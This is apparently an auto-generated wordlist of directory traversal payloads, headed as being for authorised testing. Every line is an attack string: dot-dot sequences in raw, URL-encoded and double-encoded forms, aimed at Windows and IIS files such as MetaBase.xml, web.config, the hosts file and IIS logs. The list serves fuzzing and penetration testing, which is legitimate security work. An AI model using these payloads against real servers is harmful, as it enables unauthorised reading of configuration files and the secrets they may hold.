# Auto-generated payloads for authorized testing only

%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\drivers\etc\hosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\inetpub\wwwroot\web.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\drivers\etc\hosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\inetpub\wwwroot\web.config
%2e%2e%252f%2e%2e%252f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%252f%2e%2e%252f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%252f%2e%2e%252f%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%252f%2e%2e%252fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%252f%2e%2e%252fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%252f%2e%2e%252fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%252f%2e%2e%252fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%252f%2e%2e%252fC:\Windows\System32\drivers\etc\hosts
%2e%2e%252f%2e%2e%252fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%252f%2e%2e%252fC:\inetpub\wwwroot\web.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\inetpub\wwwroot\web.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\inetpub\wwwroot\web.config
%2e%2e%2f%2e%2e%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%2f%2e%2e%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%2f%2e%2e%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%2f%2e%2e%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%2f%2e%2e%2fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%2f%2e%2e%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%2f%2e%2e%2fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts
%2e%2e%2f%2e%2e%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%2f%2e%2e%2fC:\inetpub\wwwroot\web.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\drivers\etc\hosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\inetpub\wwwroot\web.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\drivers\etc\hosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\inetpub\wwwroot\web.config
%2e%2e%5c%2e%2e%5c%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
%2e%2e%5c%2e%2e%5c%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
%2e%2e%5c%2e%2e%5c%SystemRoot%\System32\inetsrv\MetaBase.xml
%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%5c%2e%2e%5cC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
%2e%2e%5c%2e%2e%5cC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5cC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
%2e%2e%5c%2e%2e%5cC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%5c%2e%2e%5cC:\Windows\System32\drivers\etc\hosts
%2e%2e%5c%2e%2e%5cC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
%2e%2e%5c%2e%2e%5cC:\inetpub\wwwroot\web.config
..%2f..%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..%2f..%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..%2f..%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
..%2f..%2f..%2f..%2f..%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..%2f..%2f..%2f..%2f..%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..%2f..%2f..%2f..%2f..%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\drivers\etc\hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\inetpub\wwwroot\web.config
..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%2f..%2f..%2f..%2f..%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..%2f..%2f..%2f..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%2f..%2f..%2f..%2f..%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..%2f..%2f..%2f..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\drivers\etc\hosts
..%2f..%2f..%2f..%2f..%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..%2f..%2f..%2f..%2f..%2fC:\inetpub\wwwroot\web.config
..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%2f..%2fC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%2f..%2fC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
..%2f..%2fC:\Windows\System32\drivers\etc\hosts
..%2f..%2fC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..%2f..%2fC:\inetpub\wwwroot\web.config
..%5c..%5c%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..%5c..%5c%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..%5c..%5c%SystemRoot%\System32\inetsrv\MetaBase.xml
..%5c..%5c..%5c..%5c..%5c%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..%5c..%5c..%5c..%5c..%5c%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..%5c..%5c..%5c..%5c..%5c%SystemRoot%\System32\inetsrv\MetaBase.xml
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%SystemRoot%\System32\inetsrv\MetaBase.xml
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cinetpub%255cwwwroot%255cweb.config
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cinetpub%5cwwwroot%5cweb.config
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\drivers\etc\hosts
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\inetpub\wwwroot\web.config
..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%5c..%5c..%5c..%5c..%5cC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..%5c..%5c..%5c..%5c..%5cC:%255cinetpub%255cwwwroot%255cweb.config
..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5c..%5c..%5cC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..%5c..%5c..%5c..%5c..%5cC:%5cinetpub%5cwwwroot%5cweb.config
..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\drivers\etc\hosts
..%5c..%5c..%5c..%5c..%5cC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..%5c..%5c..%5c..%5c..%5cC:\inetpub\wwwroot\web.config
..%5c..%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%5c..%5cC:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..%5c..%5cC:%255cinetpub%255cwwwroot%255cweb.config
..%5c..%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%5c..%5cC:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..%5c..%5cC:%5cinetpub%5cwwwroot%5cweb.config
..%5c..%5cC:\Windows\System32\drivers\etc\hosts
..%5c..%5cC:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..%5c..%5cC:\inetpub\wwwroot\web.config
../../%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
../../%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
../../%SystemRoot%\System32\inetsrv\MetaBase.xml
../../../../../%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
../../../../../%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
../../../../../%SystemRoot%\System32\inetsrv\MetaBase.xml
../../../../../../../../%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
../../../../../../../../%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
../../../../../../../../%SystemRoot%\System32\inetsrv\MetaBase.xml
../../../../../../../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
../../../../../../../../C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
../../../../../../../../C:%255cinetpub%255cwwwroot%255cweb.config
../../../../../../../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
../../../../../../../../C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
../../../../../../../../C:%5cinetpub%5cwwwroot%5cweb.config
../../../../../../../../C:\Windows\System32\drivers\etc\hosts
../../../../../../../../C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
../../../../../../../../C:\inetpub\wwwroot\web.config
../../../../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
../../../../../C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
../../../../../C:%255cinetpub%255cwwwroot%255cweb.config
../../../../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
../../../../../C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
../../../../../C:%5cinetpub%5cwwwroot%5cweb.config
../../../../../C:\Windows\System32\drivers\etc\hosts
../../../../../C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
../../../../../C:\inetpub\wwwroot\web.config
../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
../../C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
../../C:%255cinetpub%255cwwwroot%255cweb.config
../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
../../C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
../../C:%5cinetpub%5cwwwroot%5cweb.config
../../C:\Windows\System32\drivers\etc\hosts
../../C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
../../C:\inetpub\wwwroot\web.config
..\..\%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..\..\%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..\..\%SystemRoot%\System32\inetsrv\MetaBase.xml
..\..\..\..\..\%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..\..\..\..\..\%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..\..\..\..\..\%SystemRoot%\System32\inetsrv\MetaBase.xml
..\..\..\..\..\..\..\..\%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
..\..\..\..\..\..\..\..\%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
..\..\..\..\..\..\..\..\%SystemRoot%\System32\inetsrv\MetaBase.xml
..\..\..\..\..\..\..\..\C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..\..\..\..\..\..\..\..\C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..\..\..\..\..\..\..\..\C:%255cinetpub%255cwwwroot%255cweb.config
..\..\..\..\..\..\..\..\C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..\..\..\..\..\..\..\..\C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..\..\..\..\..\..\..\..\C:%5cinetpub%5cwwwroot%5cweb.config
..\..\..\..\..\..\..\..\C:\Windows\System32\drivers\etc\hosts
..\..\..\..\..\..\..\..\C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..\..\..\..\..\..\..\..\C:\inetpub\wwwroot\web.config
..\..\..\..\..\C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..\..\..\..\..\C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..\..\..\..\..\C:%255cinetpub%255cwwwroot%255cweb.config
..\..\..\..\..\C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..\..\..\..\..\C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..\..\..\..\..\C:%5cinetpub%5cwwwroot%5cweb.config
..\..\..\..\..\C:\Windows\System32\drivers\etc\hosts
..\..\..\..\..\C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..\..\..\..\..\C:\inetpub\wwwroot\web.config
..\..\C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..\..\C:%255cinetpub%255clogs%255cLogFiles%255cW3SVC1%255cu_ex*.*
..\..\C:%255cinetpub%255cwwwroot%255cweb.config
..\..\C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..\..\C:%5cinetpub%5clogs%5cLogFiles%5cW3SVC1%5cu_ex*.*
..\..\C:%5cinetpub%5cwwwroot%5cweb.config
..\..\C:\Windows\System32\drivers\etc\hosts
..\..\C:\inetpub\logs\LogFiles\W3SVC1\u_ex*.*
..\..\C:\inetpub\wwwroot\web.config
/..%2f..%2f/..%2f..%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
/..%2f..%2f/..%2f..%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
/..%2f..%2f/..%2f..%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f%SystemRoot%%255cSystem32%255cinetsrv%255cMetaBase.xml
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f%SystemRoot%%5cSystem32%5cinetsrv%5cMetaBase.xml
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f%SystemRoot%\System32\inetsrv\MetaBase.xml
